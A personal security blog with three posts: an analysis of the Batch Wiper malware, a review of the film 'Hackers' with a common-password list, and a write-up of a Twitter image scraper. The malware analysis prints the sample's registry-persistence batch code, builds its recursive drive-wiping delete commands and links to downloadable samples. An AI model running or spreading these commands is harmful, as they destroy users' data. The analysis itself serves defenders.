Friday, December 28, 2012

A look into the Batch Wiper virus

The Iranian CERT reported the existence of a new targeted data wiping malware.
Although it was first thought to be another serious, country-level virus, deeper analysis shows that it is a relatively simple attack.

GrooveMonitor.exe is the main file.
Checking the file with a hex editor, we notice something nice.

Basically, it's a self-extracting RAR file.
Opening the archive we see three more files: jucheck.exe, juboot.exe and SLEEP.EXE.

If we look at juboot.exe in a hex editor we find the following signature:




The header belongs to "the Ultimate Packer for eXecutables" (http://upx.sourceforge.net).
I then opened the file with PE Explorer, allowing me to see that the file is basically a batch file with the following content:

@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f

start "" /D"%systemroot%\system32\" "jucheck.exe"


It looks like juboot.exe sleeps for 2 seconds and then adds a registry key ensuring that 'jucheck.exe' is executed each time the computer starts up.

In the same manner, checking jucheck.exe shows that it is also a batch file.
This batch file is longer, so I'll summarize it for you; I've made the source available on Pastebin: http://pastebin.com/B2jKHUDH .

First it sleeps for 2 seconds, just like juboot.exe,
then it deletes the juboot.exe file and the original GrooveMonitor.exe.
The code then checks for specific dates to run. The dates are:
  • 10-12/Dec/2012
  • 21-23/Jan/2013
  • 6-8/May/2013
  • 22-24/Jul/2013
  • 11-13/Nov/2013
  • 3-5/Feb/2014
  • 5-7/May/2014
  • 11-13/Aug/2014
  • 2-4/Feb/2015
On these dates it attempts to wipe the data on the local drives using a simple "del /q /s /f" command on drives D, E, F, G, H and I.
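For illustration, here's a harmless dry-run sketch of that trigger logic in Python (my own reimplementation, not the malware's code; the actual sample is a Windows batch file, and the only facts taken from it are the date windows and the del command):

```python
from datetime import date

# Trigger windows taken from the batch file's date checks
TRIGGER_RANGES = [
    (date(2012, 12, 10), date(2012, 12, 12)),
    (date(2013, 1, 21), date(2013, 1, 23)),
    (date(2013, 5, 6), date(2013, 5, 8)),
    (date(2013, 7, 22), date(2013, 7, 24)),
    (date(2013, 11, 11), date(2013, 11, 13)),
    (date(2014, 2, 3), date(2014, 2, 5)),
    (date(2014, 5, 5), date(2014, 5, 7)),
    (date(2014, 8, 11), date(2014, 8, 13)),
    (date(2015, 2, 2), date(2015, 2, 4)),
]

def is_trigger_date(today):
    """Return True if `today` falls inside one of the wipe windows."""
    return any(start <= today <= end for start, end in TRIGGER_RANGES)

def wipe_commands():
    """Build (but never run!) the per-drive delete commands the batch uses."""
    return ['del /q /s /f {}:\\*'.format(d) for d in "DEFGHI"]
```

That's the whole "logic bomb": a calendar check followed by recursive deletes, nothing more sophisticated.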

The batch then moves on and attempts to erase the desktop in the same way.
Finally, the batch file runs "calc" (where did this come from?).

I haven't finished messing with the samples, but as you've seen it's not a sophisticated attack, and it will be easy to detect and stop before any damage is done.

If you want to look at the samples for yourselves, I've made them available at http://turbobit.net/aywxvv08e83b.html

Enjoy.

Sunday, December 23, 2012

Hack the planet


Hackers (1995)

This weekend I took the time to re-watch one of the best hacker movies, which I believe to be a true classic: "Hackers". The film was released back in 1995 and featured a cool cast. Check it out at http://www.imdb.com/title/tt0113243/
It's true that the movie is outdated and the graphical effects have nothing to do with actual hacking, but the movie has great things in it even for today's viewer.
 
Angelina Jolie - Hackers (1995)

Angelina Jolie as a hacker

Angelina plays "Acid Burn", an "Elite" hacker showing that women can hold their own in this world.

The warning to keep away from most common passwords.

In the movie, the first hack into the Gibson mainframe used one of the four most used passwords: Love, Sex, Secret and God.
I'm not sure if that was true back in 1995, but according to different breaches and leaks from the past year, the top passwords in 2012 are actually:
  1. password
  2. 123456 /12345678 /1234 /12345
  3. qwerty
  4. dragon
  5. baseball
  6. football
  7. letmein (one of my favorites)
  8. monkey
  9. 111111
Please let's be a bit more creative in 2013.
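To make the point practical, here's a trivial Python filter against that list (the helper name and the set are my own, purely illustrative):

```python
# Reject a candidate password if it appears in the 2012 top-passwords
# list quoted above (case-insensitively).
COMMON_PASSWORDS = {
    "password", "123456", "12345678", "1234", "12345",
    "qwerty", "dragon", "baseball", "football",
    "letmein", "monkey", "111111",
}

def is_too_common(candidate):
    """Return True if the candidate is one of the most-used passwords."""
    return candidate.lower() in COMMON_PASSWORDS
```

A real password checker would of course use a much larger leaked-password corpus, but even this tiny blacklist would have blocked the Gibson hack.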
Just to further emphasize the point, here's a scene from another great classic, Spaceballs.


Online worldwide hacking community




This is only a small part of the movie but it is very much relevant in today's world.
Looking at hacker groups and the way they operate, countries and borders have no real meaning. Although some hacker groups are associated with specific countries, there is no way to determine the nationality or location of their members. A great example is Anonymous: there are no real leaders and no single cause, which allows anyone to join, and the group calls upon all who can to do so.

Great One liners

Some of these really caught on.
"Mess with the best Die like the rest"
"Hacking is more than just a crime, it a survival trade"
And of course my favorite, "Hack the planet"


Have you seen the movie ?
What do you think ?

Saturday, December 15, 2012

View Twitter profile images

A while ago I noticed that Twitter changed their design for user images.
We used to have the option of a picture grid showing all the images a user posted; however, it seems that Twitter disabled that feature, only allowing visitors to view one image at a time.
The missing grid view is a pain and a lot of people want it back, as seen in this support thread at Twitter: https://dev.twitter.com/discussions/9843

So I decided to create an application that will let me get a profile's images easily.

The obvious way to go about programming this is to use the Twitter API (after reading the documentation, of course :-) ).
I noticed two Twitter API functions that let us reach our goal using plain and simple HTTP GET requests.

1 - http://api.twitter.com/1/statuses/user_timeline.xml?screen_name=CodeBTL
The user_timeline.xml command returns a simple XML file with the user's recent tweets.
The function supports additional parameters, like count, which lets you specify the maximum number of tweets to receive, and trim_user, which removes the appended user data.
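Building such a request is just a matter of appending query parameters; here's a quick Python sketch (purely illustrative, and note that this unauthenticated v1 endpoint has since been retired by Twitter):

```python
from urllib.parse import urlencode

def user_timeline_url(screen_name, count=200, trim_user=True):
    """Build the v1 user_timeline request URL with optional parameters."""
    params = {"screen_name": screen_name, "count": count}
    if trim_user:
        params["trim_user"] = 1
    return ("http://api.twitter.com/1/statuses/user_timeline.xml?"
            + urlencode(params))
```

Fetching that URL with any HTTP client returns the XML shown below.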
XML result from the Twitter user_timeline function





Notice that for each tweet we get the tweet id and the tweet text.

2 - http://api.twitter.com/1/statuses/show.xml?id=279580723336331264&include_entities=1
The show.xml function receives a tweet id and returns an XML description of that tweet.
Like most functions on Twitter, it supports additional parameters; the most important one for us is include_entities, which shows us whether any media links exist in the tweet, allowing us to take the link and display the image.
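Pulling media URLs out of such a response can be sketched with Python's standard XML parser. The sample below is hand-made and the element names are my guess at the v1 XML layout, so verify them against a real show.xml response:

```python
import xml.etree.ElementTree as ET

# Hand-made sample -- element names are illustrative, not authoritative.
SAMPLE = """<status>
  <id>279580723336331264</id>
  <text>a tweet with a picture http://t.co/abc123</text>
  <entities>
    <media>
      <media_url>http://pbs.twimg.com/media/example.jpg</media_url>
    </media>
  </entities>
</status>"""

def media_urls(status_xml):
    """Collect every <media_url> found anywhere under the status element."""
    root = ET.fromstring(status_xml)
    return [el.text for el in root.iter("media_url")]
```

Searching the whole tree with iter() means we don't have to hard-code the exact nesting, which is handy when the layout is uncertain.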
XML result from the Twitter show function
When testing my application I found a big problem.
Twitter limits unauthenticated requests to 150 per hour, and each of our GET requests counts as one. Reference: https://dev.twitter.com/docs/rate-limiting
That means we can only check fewer than 150 tweets for images, and this really limits us.
I tried registering an application with Twitter and authenticating a user for the requests, but the limit seems to be final.
The only option I saw to bypass the limit is not to use the Twitter API and to do some HTML scraping instead.

I created a simple form allowing the user to enter the Twitter username whose images they want to retrieve.

Once submitted, I use the first URL in this post, figuring that, for now, 150 requests per hour is enough. The result is an XML file with up to 200 status nodes.

I iterate through all of the status texts looking for links.
Twitter changes all posted links (including uploaded media files) to its t.co short format.
To check for them we can use a regular expression (note the escaped dot, so "t.co" is matched literally):
Match m = Regex.Match(TweetText, @"(?<twitterURL>t\.co)/(?<subdir>[^\s]*)");
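For reference, the equivalent extraction sketched in Python (illustrative only, same named-group pattern):

```python
import re

# Match a t.co short link and capture the path component after the slash.
TCO = re.compile(r"(?P<twitterURL>t\.co)/(?P<subdir>[^\s]*)")

def extract_tco(tweet_text):
    """Return the t.co path component from a tweet's text, or None."""
    m = TCO.search(tweet_text)
    return m.group("subdir") if m else None
```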

If we find a link we can't just download it, since Twitter will redirect us from t.co to the location of the original link. In order to capture the actual image we send an HTTP HEAD request, without following redirects, and read the target from the Location header:
    var request = (HttpWebRequest)WebRequest.Create(new Uri(@"http://t.co/" + m.Groups["subdir"].Value));
    request.Method = "HEAD";
    request.AllowAutoRedirect = false;
    string location;
    using (var response = request.GetResponse() as HttpWebResponse)
    {
        location = response.GetResponseHeader("Location");
    }


Upon receiving the new location, we notice that we are not redirected to the image itself but to a web page displaying the image.

Currently I support two types of images: hosted on Twitter (the URL starts with twitter.com and contains /photo/) or hosted on Instagram (the URL starts with instagr.am).
To finish our scraping session we need to find the correct image tag on the web page.
For twitter, the img tag class attribute has the value "large media-slideshow-image".
For instagram, the img tag class attribute has the value "photo".
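A Python sketch of the same tag-and-class scan (illustrative; the class values are the ones noted above and may of course change whenever the sites redesign):

```python
import re

# Match a whole <img ...> tag, then pull attributes out of it.
IMG_TAG = re.compile(r"<img[^>]*>", re.IGNORECASE)
CLASS_ATTR = re.compile(r'class="(.*?)"')
SRC_ATTR = re.compile(r'src="(.*?)"')

def image_sources(html, wanted_class):
    """Return src values of img tags whose class attribute equals wanted_class."""
    results = []
    for tag in IMG_TAG.findall(html):
        cls = CLASS_ATTR.search(tag)
        src = SRC_ATTR.search(tag)
        if cls and src and cls.group(1) == wanted_class:
            results.append(src.group(1))
    return results
```

For Twitter pages you would call it with "large media-slideshow-image", for Instagram pages with "photo".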


Since all of the code up to this point was self-written, I didn't want to use the HTML Agility Pack or another third-party component. So, using regular expressions again, I wrote the GetImageTags function:
        private List<ImgTag> GetImageTags(String html)
        {
            List<ImgTag> imgTags = new List<ImgTag>();
            // Match each img tag up to its closing '>'
            MatchCollection m1 = Regex.Matches(html, @"(<img.*?>)", RegexOptions.Singleline);
            foreach (Match m in m1)
            {
                string value = m.Groups[1].Value;
                ImgTag imgTag = new ImgTag();
                // Extract the src attribute value
                Match m2 = Regex.Match(value, @"src=\""(.*?)\""", RegexOptions.Singleline);
                if (m2.Success)
                {
                    imgTag.src = m2.Groups[1].Value;
                }
                // Extract the class attribute value
                m2 = Regex.Match(value, @"class=\""(.*?)\""", RegexOptions.Singleline);
                if (m2.Success)
                {
                    imgTag.classAtt = m2.Groups[1].Value;
                }
                imgTags.Add(imgTag);
            }
            return imgTags;
        }



If we retrieve the src attribute value, all we have left to do is download the image.

You can get the Twitter image downloader application at my codeplex project page https://twitterimagedownload.codeplex.com/
Take a look at the source code; recommendations and remarks are welcome.

Update 29/6/2013 : I've updated the project to support the Twitter API Ver. 1.1.
That should fix the crash issue that occurred when fetching the images.


Twitter Image Downloader